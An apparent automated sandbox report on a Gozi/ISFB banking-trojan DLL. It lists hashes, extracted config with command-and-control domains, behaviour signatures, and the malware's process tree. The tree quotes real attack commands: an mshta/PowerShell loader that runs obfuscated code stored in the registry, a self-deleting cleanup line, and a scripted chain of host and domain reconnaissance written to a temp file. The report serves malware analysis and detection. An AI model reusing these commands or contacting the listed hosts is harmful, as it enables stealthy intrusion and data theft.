Analysis
-
max time kernel
151s -
max time network
124s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24/01/2022, 10:09
Static task
static1
Behavioral task
behavioral1
Sample
61ee6edf7de65.dll
Resource
win7-en-20211208
0 signatures
0 seconds
General
-
Target
61ee6edf7de65.dll
-
Size
95KB
-
MD5
b6f0fc5638a110abac1a54805f77e786
-
SHA1
f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
-
SHA256
06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
-
SHA512
b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8
Malware Config
Extracted
Family
gozi_ifsb
Botnet
20000
C2
giporedtrip.at
habpfans.at
Attributes
-
base_path
/drew/
-
build
260224
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Extracted
Family
gozi_ifsb
Botnet
20000
C2
giporedtrip.at
habpfans.at
Attributes
-
base_path
/images/
-
build
260224
-
exe_type
worker
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
rsa_pubkey.plain
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 23 3140 rundll32.exe 24 3140 rundll32.exe 25 3140 rundll32.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3008 set thread context of 3020 3008 powershell.exe 34 PID 3020 set thread context of 2304 3020 Explorer.EXE 79 PID 3020 set thread context of 3492 3020 Explorer.EXE 32 PID 2304 set thread context of 1928 2304 cmd.exe 81 PID 3020 set thread context of 1576 3020 Explorer.EXE 89 PID 3020 set thread context of 3204 3020 Explorer.EXE 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 1424 net.exe 1256 net.exe 2352 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2124 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1972 systeminfo.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1928 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1928 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3140 rundll32.exe 3140 rundll32.exe 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3020 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 3008 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 2304 cmd.exe 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeDebugPrivilege 2124 tasklist.exe Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3020 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3804 wrote to memory of 3140 3804 rundll32.exe 68 PID 3804 wrote to memory of 3140 3804 rundll32.exe 68 PID 3804 wrote to memory of 3140 3804 rundll32.exe 68 PID 3728 wrote to memory of 3008 3728 mshta.exe 73 PID 3728 wrote to memory of 3008 3728 mshta.exe 73 PID 3008 wrote to memory of 1224 3008 powershell.exe 75 PID 3008 wrote to memory of 1224 3008 powershell.exe 75 PID 1224 wrote to memory of 692 1224 csc.exe 76 PID 1224 wrote to memory of 692 1224 csc.exe 76 PID 3008 wrote to memory of 4028 3008 powershell.exe 77 PID 3008 wrote to memory of 4028 3008 powershell.exe 77 PID 4028 wrote to memory of 1252 4028 csc.exe 78 PID 4028 wrote to memory of 1252 4028 csc.exe 78 PID 3008 wrote to memory of 3020 3008 powershell.exe 34 PID 3008 wrote to memory of 3020 3008 powershell.exe 34 PID 3008 wrote to memory of 3020 3008 powershell.exe 34 PID 3008 wrote to memory of 3020 3008 powershell.exe 34 PID 3020 wrote to memory of 2304 3020 Explorer.EXE 79 PID 3020 wrote to memory of 2304 3020 Explorer.EXE 79 PID 3020 wrote to memory of 2304 3020 Explorer.EXE 79 PID 3020 wrote to memory of 3492 3020 Explorer.EXE 32 PID 3020 wrote to memory of 3492 3020 Explorer.EXE 32 PID 3020 wrote to memory of 2304 3020 Explorer.EXE 79 PID 3020 wrote to memory of 2304 3020 Explorer.EXE 79 PID 3020 wrote to memory of 3492 3020 Explorer.EXE 32 PID 3020 wrote to memory of 3492 3020 Explorer.EXE 32 PID 2304 wrote to memory of 1928 2304 cmd.exe 81 PID 2304 wrote to memory of 1928 2304 cmd.exe 81 PID 2304 wrote to memory of 1928 2304 cmd.exe 81 PID 2304 wrote to memory of 1928 2304 cmd.exe 81 PID 2304 wrote to memory of 1928 2304 cmd.exe 81 PID 3020 wrote to memory of 3260 3020 Explorer.EXE 82 PID 3020 wrote to memory of 3260 3020 Explorer.EXE 82 PID 3260 wrote to memory of 2816 3260 cmd.exe 84 PID 3260 wrote to memory of 2816 3260 cmd.exe 84 PID 3020 wrote to memory of 2892 3020 Explorer.EXE 85 PID 3020 wrote to memory of 2892 3020 Explorer.EXE 85 PID 3020 wrote to memory of 2028 3020 Explorer.EXE 87 PID 3020 wrote to memory of 2028 3020 Explorer.EXE 87 PID 3020 wrote to memory of 1576 3020 Explorer.EXE 89 PID 3020 wrote to memory of 1576 3020 Explorer.EXE 89 PID 3020 wrote to memory of 1576 3020 Explorer.EXE 89 PID 2028 wrote to memory of 1972 2028 cmd.exe 90 PID 2028 wrote to memory of 1972 2028 cmd.exe 90 PID 3020 wrote to memory of 1576 3020 Explorer.EXE 89 PID 3020 wrote to memory of 1576 3020 Explorer.EXE 89 PID 3020 wrote to memory of 3204 3020 Explorer.EXE 92 PID 3020 wrote to memory of 3204 3020 Explorer.EXE 92 PID 3020 wrote to memory of 3204 3020 Explorer.EXE 92 PID 3020 wrote to memory of 3204 3020 Explorer.EXE 92 PID 3020 wrote to memory of 3204 3020 Explorer.EXE 92 PID 3020 wrote to memory of 3204 3020 Explorer.EXE 92 PID 3020 wrote to memory of 1748 3020 Explorer.EXE 96 PID 3020 wrote to memory of 1748 3020 Explorer.EXE 96 PID 3020 wrote to memory of 756 3020 Explorer.EXE 98 PID 3020 wrote to memory of 756 3020 Explorer.EXE 98 PID 756 wrote to memory of 1424 756 cmd.exe 100 PID 756 wrote to memory of 1424 756 cmd.exe 100 PID 3020 wrote to memory of 1792 3020 Explorer.EXE 101 PID 3020 wrote to memory of 1792 3020 Explorer.EXE 101 PID 3020 wrote to memory of 2676 3020 Explorer.EXE 103 PID 3020 wrote to memory of 2676 3020 Explorer.EXE 103 PID 2676 wrote to memory of 436 2676 cmd.exe 105 PID 2676 wrote to memory of 436 2676 cmd.exe 105
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3140
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp" "c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP"5⤵PID:692
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp" "c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP"5⤵PID:1252
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1928
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2816
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"2⤵PID:2892
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1972
-
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:1576
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:3204
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1748
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1424
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1792
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:436
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2144
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2460
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1732
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1576
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:708
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2244
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:4016
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:2624
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2172
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2700
-
C:\Windows\system32\net.exenet config workstation3⤵PID:1908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:2272
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:3992
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:872
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1076
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1744
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:1692
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1928
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:912
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:1256
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:1972
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2316
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:2352
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:3048
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"2⤵PID:2240
-